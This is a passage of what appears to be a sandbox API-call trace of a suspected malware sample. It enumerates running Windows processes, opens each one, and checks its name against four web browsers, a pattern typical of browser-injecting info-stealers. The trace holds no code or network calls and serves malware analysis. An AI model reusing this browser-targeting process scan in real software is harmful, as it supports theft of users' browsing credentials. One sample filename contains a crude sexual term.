	[0199.319] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0199.320] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x18d4
	[0199.320] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.320] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0199.321] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.321] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.321] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.321] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0199.321] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.321] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.321] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0199.322] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x18d8
	[0199.322] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.322] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0199.323] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.323] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.323] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.323] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0199.323] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.323] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.323] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0199.324] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x18dc
	[0199.324] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.324] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0199.324] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.324] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.325] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.325] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0199.325] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.325] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.325] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0199.326] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x18e0
	[0199.326] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.326] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0199.327] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.327] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.327] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.327] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0199.327] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.327] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.327] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0199.328] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x18e4
	[0199.328] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.328] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0199.329] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.329] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.329] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.329] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0199.329] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.329] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.329] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0199.330] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x18e8
	[0199.330] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.330] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0199.330] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.330] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.330] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.331] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0199.331] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.331] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.331] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0199.332] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x18ec
	[0199.332] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.332] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0199.332] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.332] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.332] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.332] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0199.333] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.333] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.333] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0199.333] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x18f0
	[0199.334] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.334] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0199.334] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.334] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.334] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.334] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0199.334] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.334] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.335] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0199.335] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x18f4
	[0199.335] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.335] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0199.336] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.336] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.336] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.336] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0199.336] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.336] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.337] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0199.337] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x18f8
	[0199.337] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.337] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0199.338] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.338] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.338] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.338] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0199.338] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.338] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.339] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0199.339] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x18fc
	[0199.339] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.339] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0199.340] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.340] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.340] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.340] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0199.340] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.340] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.341] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0199.341] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x1900
	[0199.341] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.341] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0199.342] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.342] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.342] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.342] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0199.342] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.342] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.342] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0199.343] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x1904
	[0199.343] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.343] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0199.344] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.344] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.344] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.344] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0199.344] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.344] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.344] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0199.345] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x1908
	[0199.345] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.345] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0199.345] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.346] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.346] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.346] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0199.346] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.346] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.346] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0199.347] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x190c
	[0199.347] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.347] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0199.347] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.347] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.348] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.348] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0199.348] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.348] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.348] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0199.349] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x1910
	[0199.349] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.349] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0199.349] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.349] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.350] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.350] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0199.350] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.350] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.350] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0199.351] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x1914
	[0199.351] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.351] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0199.351] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.351] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.352] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.352] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0199.352] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.352] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.352] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0199.353] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x1918
	[0199.353] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.353] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0199.354] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.354] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.354] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.354] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0199.354] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.354] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.355] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0199.355] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x191c
	[0199.355] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.355] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0199.356] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.356] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.356] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.356] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0199.356] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.357] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.357] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0199.358] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x1920
	[0199.358] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.358] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0199.358] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.358] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.358] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.359] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0199.359] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.359] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.359] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0199.360] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x1924
	[0199.360] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.360] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0199.360] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.360] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.360] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.360] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0199.360] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.361] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.361] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0199.361] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x1928
	[0199.361] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.361] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0199.362] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.362] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.362] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.362] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0199.362] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.362] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.363] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0199.363] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0199.363] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0199.364] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x192c
	[0199.364] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.364] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0199.365] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.365] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.365] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.365] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0199.366] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.366] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.366] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0199.367] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x1930
	[0199.367] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.367] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0199.367] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.367] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.368] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.368] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0199.368] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.368] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.368] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0199.369] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x1934
	[0199.369] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.369] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0199.369] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
